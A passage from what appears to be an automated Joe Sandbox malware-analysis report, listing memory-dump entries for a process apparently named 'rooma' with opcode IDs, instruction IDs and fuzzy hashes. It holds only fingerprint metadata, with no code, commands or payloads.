                                                            • Instruction Fuzzy Hash: F7F082B0A1024AEBDB14EBA8D916E6EB7B8BF44344F444059B901EB2D0EA74D901C758
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 29a6642c7ef7ed3592a36acdccc95c3bae471711bc0d42908ddba4b2807d0017
                                                            • Instruction ID: d755471fec5711d45774639e95fc444502b0c0aed3cc5df403c1c19daf91bcf2
                                                            • Opcode Fuzzy Hash: 29a6642c7ef7ed3592a36acdccc95c3bae471711bc0d42908ddba4b2807d0017
                                                            • Instruction Fuzzy Hash: 26F0E53355461467C231AA4DCC05F5BFBACEBE5B70F10031ABA649B1D0DA70A901C7D6
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 83a54a6256465af824f36d2773b992cdd2e59d7b34fe2f5ed8719e4b3f554ccb
                                                            • Instruction ID: 864e9a54f82e48fe6a722af73bb1e10b7eeabd9081c855b5545fcfeae3d1a744
                                                            • Opcode Fuzzy Hash: 83a54a6256465af824f36d2773b992cdd2e59d7b34fe2f5ed8719e4b3f554ccb
                                                            • Instruction Fuzzy Hash: F9F08270A0024AEBDB04DBA9D946E9EB7B8BF59644F500159A502FB2D0EA74E9008718
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9356a15e85f73e7b898d501616f2efa73d0def1bdaf700a63870359f1b26a790
                                                            • Instruction ID: 45caaefb2b699fb7c1ed2daa930eeedd7c403741712cb170a01b1ba2350b995c
                                                            • Opcode Fuzzy Hash: 9356a15e85f73e7b898d501616f2efa73d0def1bdaf700a63870359f1b26a790
                                                            • Instruction Fuzzy Hash: 56F0E270A1020AEBDB14EBA8D906E6EB7B8BF44304F004058B902EB290EA70D9008758
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5cbb3199f64ad3adc2e2be5f68a46b85cb7c90f73b57f92f0499470b4fd79333
                                                            • Instruction ID: db26afafb5ae401339bcaba81e621210e201dbb8aaee5788c63e5dd0acc7028b
                                                            • Opcode Fuzzy Hash: 5cbb3199f64ad3adc2e2be5f68a46b85cb7c90f73b57f92f0499470b4fd79333
                                                            • Instruction Fuzzy Hash: 07F02071921A859FD737C71CC8C4B2377D8EB82AB8F088464D6098FF82CB29D880C290
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 20df9d8f5a9654f9cba6bc6d680083f8f2233c08288762a7815017c291d8821a
                                                            • Instruction ID: 9327daea2231a8df04c501729cb242427c9b327e1eb01d1c9dcfda91fa3eb98f
                                                            • Opcode Fuzzy Hash: 20df9d8f5a9654f9cba6bc6d680083f8f2233c08288762a7815017c291d8821a
                                                            • Instruction Fuzzy Hash: EAF08270A0124AEBDB14EBA9D946E9E77B8BF48344F500094E602EB390EA74D9018758
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 391646c2505f6a1d946b9f35c9dfd9f3cfeef93d45bd6dd6944193bff40d57a7
                                                            • Instruction ID: cac56054dcdf81bbec2fe448b194b9a4b580204eb7019d1378c130e07720c9b7
                                                            • Opcode Fuzzy Hash: 391646c2505f6a1d946b9f35c9dfd9f3cfeef93d45bd6dd6944193bff40d57a7
                                                            • Instruction Fuzzy Hash: 55F08270A1024AEBDB14EBA9D95AE9E7BB8BF48344F500058A502EF290EA74D9008718
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 09511f6a5b3cabbe784265c74914248b525a176bb6667c193042ebcc910e885d
                                                            • Instruction ID: 3ded4edaefada03c339b2765c7be5dd42284d842881a2bcbe7c8462d25917566
                                                            • Opcode Fuzzy Hash: 09511f6a5b3cabbe784265c74914248b525a176bb6667c193042ebcc910e885d
                                                            • Instruction Fuzzy Hash: 59E0E533260615AFC2211E8ADC00F16FBA9FFA0BB1F108529A1585B5D0D764BC11CBD4
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: c4ec20401a4f00edc4d3c40b801d16ef5348a1ab8573d48b789ab28d9976608a
                                                            • Instruction ID: 12a40c380665d03385fa02b3dc6404475c3d535ef0a8ab4f8f48619b4813c8ea
                                                            • Opcode Fuzzy Hash: c4ec20401a4f00edc4d3c40b801d16ef5348a1ab8573d48b789ab28d9976608a
                                                            • Instruction Fuzzy Hash: B8E09232100595ABC721BB29DD11F8A77AAFFA1364F014515F1555B190CB70AC50C7C4
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2862d5c95079e8f9bdfc17701203be164f113e2c7109adcb0461f4fb661a1a8a
                                                            • Instruction ID: c494d103c50dd297823a5351a5ee48139763f8ff5b303ee71027ae35458ddc59
                                                            • Opcode Fuzzy Hash: 2862d5c95079e8f9bdfc17701203be164f113e2c7109adcb0461f4fb661a1a8a
                                                            • Instruction Fuzzy Hash: DCE0C231285216BBDB232A44DC00FA9BB15EFA07A0F104031FA086E690C671EC92D6D4
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                            • Instruction ID: 8f0e305fdd231c88e6ad6e7105bd7ddcd115faadcf7d48a7da8b6cca20e79abe
                                                            • Opcode Fuzzy Hash: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                            • Instruction Fuzzy Hash: 0CE0C232440A22EFEB323F19DC00F5576E1FF94B11F504C2AE0C22E0A487B0AC81CB44
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6e94784816c1a202c8c2d23c53a1babc29b9342c1da4805863c07933b7b7ccb5
                                                            • Instruction ID: ed4b34b8b093bc9a7e06ea2da905689c451e38a437875cdce30f169f5b1c8658
                                                            • Opcode Fuzzy Hash: 6e94784816c1a202c8c2d23c53a1babc29b9342c1da4805863c07933b7b7ccb5
                                                            • Instruction Fuzzy Hash: ADE08C321004A16BC721FA5DED10E4A73AAFFE5260F000221F1508B690CA60AC41C795
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4e2a7842e3ad3d2fbccd4af3ec74494f12a23976bad651220f47302faef693ab
                                                            • Instruction ID: 227b54850257b52bda90976653e2306d72f532d9481521bcda0137ee6e05ecbc
                                                            • Opcode Fuzzy Hash: 4e2a7842e3ad3d2fbccd4af3ec74494f12a23976bad651220f47302faef693ab
                                                            • Instruction Fuzzy Hash: B5F03234211B80CBE32ACF08C9F1B5177B9FB45B04F444058C8428BBA9C33AA942CB40
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 513c018af8093926a425ffcf59a89caa6ba2b1d98b48f3b0c5e1abf4a0335a68
                                                            • Instruction ID: 9e069ea9d137db4566a98adb6aeb6020fc43c325601ef48269930ce181ab8ef1
                                                            • Opcode Fuzzy Hash: 513c018af8093926a425ffcf59a89caa6ba2b1d98b48f3b0c5e1abf4a0335a68
                                                            • Instruction Fuzzy Hash: B9D05E31161662AFD7327F15EE05F867ABABFE0F10F450528B1052E8F0D6A1ED85C6A4
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                            • Instruction ID: 6c36053f0a5f77db29a7c20267df18aca3f93866cf8f2535144126d27d114eae
                                                            • Opcode Fuzzy Hash: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                            • Instruction Fuzzy Hash: 47D0A932664620AFD772AA1CFC00FC373EABB88724F060459B008CB1A1C360AC81CA84
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                            • Instruction ID: 825880ed5741cdc4aac78e71acdeb43f70be195a92d5c6644828a193599619db
                                                            • Opcode Fuzzy Hash: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                            • Instruction Fuzzy Hash: 0BD02232222031E7CB286655AC10F6BB906BFC0A94F0A002E340AAB800C1048C43C2E0
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                            • Instruction ID: 82c5409723fa28ea16e91945672af4918bea3b98d56a786d27baa5532a79deac
                                                            • Opcode Fuzzy Hash: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                            • Instruction Fuzzy Hash: 23D09235262A80CFD62A8B0DC5A4B1A33A4BB44A44FC10890E501CBB62D628D940CA00
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 73b68ca8792e09d39eb84bf204166a27678a7482029cab1375adc9e7cd32c121
                                                            • Instruction ID: b58662ed6a25766854a9beaef63c09fb72da878276f6d39484840a77ed161359
                                                            • Opcode Fuzzy Hash: 73b68ca8792e09d39eb84bf204166a27678a7482029cab1375adc9e7cd32c121
                                                            • Instruction Fuzzy Hash: B5D05E35941AC4CFE727CB18C175B507BF4F705B44F891098E04247BA2C37C9984CB40
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                            • Instruction ID: cfa90935653e1f96ba99cddd05dabf2e0da868f8dab5a743f52e084dd684df16
                                                            • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                            • Instruction Fuzzy Hash: 84D01236100249EFCB01DF45C890D9B773AFBD8710F108019FD190B6508A31ED62DA50
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 228d46562787cc6ef91b6aff40b17c30ce715ed8b58bcfbb69b93c396a4a2043
                                                            • Instruction ID: 4601e8914ec4a9c42b3e57dae557b5763cd604bde030f17dfc80c42cf663d244
                                                            • Opcode Fuzzy Hash: 228d46562787cc6ef91b6aff40b17c30ce715ed8b58bcfbb69b93c396a4a2043
                                                            • Instruction Fuzzy Hash: 40C08C781A15827EEB6B5704CD58B2C3A50BF0060AFC4019CAB403D4A2C36CE8028218
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3e1905da10e5895ff83613507b5903f69eda38a0e4087b8c07e58d807fc41fb9
                                                            • Instruction ID: 4dc3d3c0073ed8cb0c2431772cc76f5ee1ca9d8f7a903f26b578bc639acfc31a
                                                            • Opcode Fuzzy Hash: 3e1905da10e5895ff83613507b5903f69eda38a0e4087b8c07e58d807fc41fb9
                                                            • Instruction Fuzzy Hash: A290022160184442D14473584808B0F4185A7E1212F99C419A4156954CC95589555721
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 649da0f443889af2913a3ac93838719f8fe661468e85d540e43584470d12ebdb
                                                            • Instruction ID: 69ad77a13115d089e3f6199c3608b5703c1e450972c8e7acdb108fb93276f408
                                                            • Opcode Fuzzy Hash: 649da0f443889af2913a3ac93838719f8fe661468e85d540e43584470d12ebdb
                                                            • Instruction Fuzzy Hash: BF90022164140802D144725884187070086E7D0611F59C411A0024954DC6568A6567B1
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 94347bc8fa33b41ba6e12a712de4f1edb88678d86355f8b58366af632f709f33
                                                            • Instruction ID: 24b509d7ad01b6683c582648da84ac9f27d8fbfb27457060e96d1accfcf4fcfc
                                                            • Opcode Fuzzy Hash: 94347bc8fa33b41ba6e12a712de4f1edb88678d86355f8b58366af632f709f33
                                                            • Instruction Fuzzy Hash: 3C900231A05800129144725848885464085B7E0311B59C411E0424954CCA548A565361
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b68dde35d7436ee83983c0b8acd97f72298c6904471b4fd8ccf30c3fb9a42357
                                                            • Instruction ID: a57971b232265391d6aa44d401f57e352d1f022e7fea5d57f8fd1389c21f21c5
                                                            • Opcode Fuzzy Hash: b68dde35d7436ee83983c0b8acd97f72298c6904471b4fd8ccf30c3fb9a42357
                                                            • Instruction Fuzzy Hash: BB900261A01500424144725848084066085B7E1311399C515A0554960CC65889559369
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 47d19593e3bc67ab661ff09d50629ce8afebeb6cba7d826b6da7c34762d2974c
                                                            • Instruction ID: 4faadddc6727fd6f5711aaee08636664f3d859198d176a1d4deb48ea4b159a63
                                                            • Opcode Fuzzy Hash: 47d19593e3bc67ab661ff09d50629ce8afebeb6cba7d826b6da7c34762d2974c
                                                            • Instruction Fuzzy Hash: 2890022164545102D154725C44086164085B7E0211F59C421A0814994DC59589556321
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7d2da81e44176e18e9220a696409bafd716d725121281961c9fffbaae946fdc2
                                                            • Instruction ID: f0b5f0935cc2dc9d4071a46ee16c8387cc77a1a461f7a89fb9a609990cdc0c89
                                                            • Opcode Fuzzy Hash: 7d2da81e44176e18e9220a696409bafd716d725121281961c9fffbaae946fdc2
                                                            • Instruction Fuzzy Hash: B490023160140802D1847258440864A0085A7D1311F99C415A0025A54DCA558B5977A1
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 0470f8d4fa1d84de2d2b54bfd885c4cdc05bb9920ce2b70264fe23acf4c1bea8
                                                            • Instruction ID: 614686f1dc46d96de1cfb479a1cfecf753be10570fcb73329dfa6eba08d8e168
                                                            • Opcode Fuzzy Hash: 0470f8d4fa1d84de2d2b54bfd885c4cdc05bb9920ce2b70264fe23acf4c1bea8
                                                            • Instruction Fuzzy Hash: 9090023160544842D14472584408A460095A7D0315F59C411A0064A94DD6658E55B761
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7d67d2923039c1429b3438ba8ab924b9c468a03824f0aff6730d8bdd826f0b59
                                                            • Instruction ID: 985e6b7801b1648b36a9335ceebd4114b4055a57615b1fe45ba16efd288526b3
                                                            • Opcode Fuzzy Hash: 7d67d2923039c1429b3438ba8ab924b9c468a03824f0aff6730d8bdd826f0b59
                                                            • Instruction Fuzzy Hash: A490023160140802D108725848086860085A7D0311F59C411A6024A55ED6A589917231
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9f54186e4c01932bbba624496a5e5bc06748cbd6d4ed92341a4b1c4f2c0983aa
                                                            • Instruction ID: de08745e8afd6f0ed004d202abe6a3cade857f7759b5053ceda64f2c4fbe7644
                                                            • Opcode Fuzzy Hash: 9f54186e4c01932bbba624496a5e5bc06748cbd6d4ed92341a4b1c4f2c0983aa
                                                            • Instruction Fuzzy Hash: 8A900231A0540802D154725844187460085A7D0311F59C411A0024A54DC7958B5577A1
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b7d1248974e066b6edd72bee313a73e1e19e7ccb3f634c3b93a52b10b829d434
                                                            • Instruction ID: 9ee5cf1ad4533ba3d69f8ab34d69679e2ad236c40905d0591cdb2a83abe633d6
                                                            • Opcode Fuzzy Hash: b7d1248974e066b6edd72bee313a73e1e19e7ccb3f634c3b93a52b10b829d434
                                                            • Instruction Fuzzy Hash: F4900225611400030109B658070850700C6A7D5361359C421F1015950CD66189615221
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 434a5a2c959f85dd26834b610c6aa9d3c59813da45d3a3c50779a38f36218b36
                                                            • Instruction ID: 695b0a4eb4e195edb3a8557a0ef80084c185365022a8f947cdb642611775ead6
                                                            • Opcode Fuzzy Hash: 434a5a2c959f85dd26834b610c6aa9d3c59813da45d3a3c50779a38f36218b36
                                                            • Instruction Fuzzy Hash: 2A900225621400020149B658060850B04C5B7D6361399C415F1416990CC66189655321
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 43047d0d4f9e01f66d3fc93609c2715b70bbdc59f2d6f57896d0813f6a807ae8
                                                            • Instruction ID: e61d4a2461a75731a8ca2a9f4d1c9c8da54f98b493b12402bc1e6fa48235ca5f
                                                            • Opcode Fuzzy Hash: 43047d0d4f9e01f66d3fc93609c2715b70bbdc59f2d6f57896d0813f6a807ae8
                                                            • Instruction Fuzzy Hash: 6D9002A1601540924504B3588408B0A4585A7E0211B59C416E1054960CC56589519235
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a7a943c25c87eeaa4e6abce30d379b29ecd79bcd9010e78749df2cb818aefbe5
                                                            • Instruction ID: d1d5a9c644c7c2bef3a9778a3c46285d44ac53089c12027f0bba5b6335d82613
                                                            • Opcode Fuzzy Hash: a7a943c25c87eeaa4e6abce30d379b29ecd79bcd9010e78749df2cb818aefbe5
                                                            • Instruction Fuzzy Hash: 2090023560140402D5147258580864600C6A7D0311F59D811A0424958DC69489A1A221
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5f35e8797dcd1400d38196328e0f96112e49db9770b6fa4dd2bc8eeba1da7b2a
                                                            • Instruction ID: d3050f94d628d1a15d05cdf48969aa9524c8f8b301846272e047fc5d2b938952
                                                            • Opcode Fuzzy Hash: 5f35e8797dcd1400d38196328e0f96112e49db9770b6fa4dd2bc8eeba1da7b2a
                                                            • Instruction Fuzzy Hash: 2E90022961340002D1847258540C60A0085A7D1212F99D815A0015958CC95589695321
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2ab8c271c863c3ffcff9e517406ffd049b7de69e8017a841861c27f431a17be0
                                                            • Instruction ID: a9ce98f62f8b3cde2e656b803d8bf9b73bf5b96bd5a3f52db84c6eb0ea341389
                                                            • Opcode Fuzzy Hash: 2ab8c271c863c3ffcff9e517406ffd049b7de69e8017a841861c27f431a17be0
                                                            • Instruction Fuzzy Hash: 0B90023160240142954473585808A4E4185A7E1312B99D815A0015954CC95489615321
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f329883de64499919a32ea63c74c6126f202d58e3fc387b6c6db59be4e64c2a3
                                                            • Instruction ID: 12431e8b94bd8ee59619cd30bf8ce36b6987e2e6759fe86401264aeff35423e5
                                                            • Opcode Fuzzy Hash: f329883de64499919a32ea63c74c6126f202d58e3fc387b6c6db59be4e64c2a3
                                                            • Instruction Fuzzy Hash: 1990022160544442D1047658540CA060085A7D0215F59D411A1064995DC6758951A231
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c2719b3cbf36c9c19091cef01df48aa18c14b089d894eed7efe418973a4d9159
                                                            • Instruction ID: f5b641957c84a6f71eeca6ec0a6b9a32453f44b981fe0e5842c232b7a3f936cc
                                                            • Opcode Fuzzy Hash: c2719b3cbf36c9c19091cef01df48aa18c14b089d894eed7efe418973a4d9159
                                                            • Instruction Fuzzy Hash: B490022170140003D1447258541C6064085F7E1311F59D411E0414954CD95589565322
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
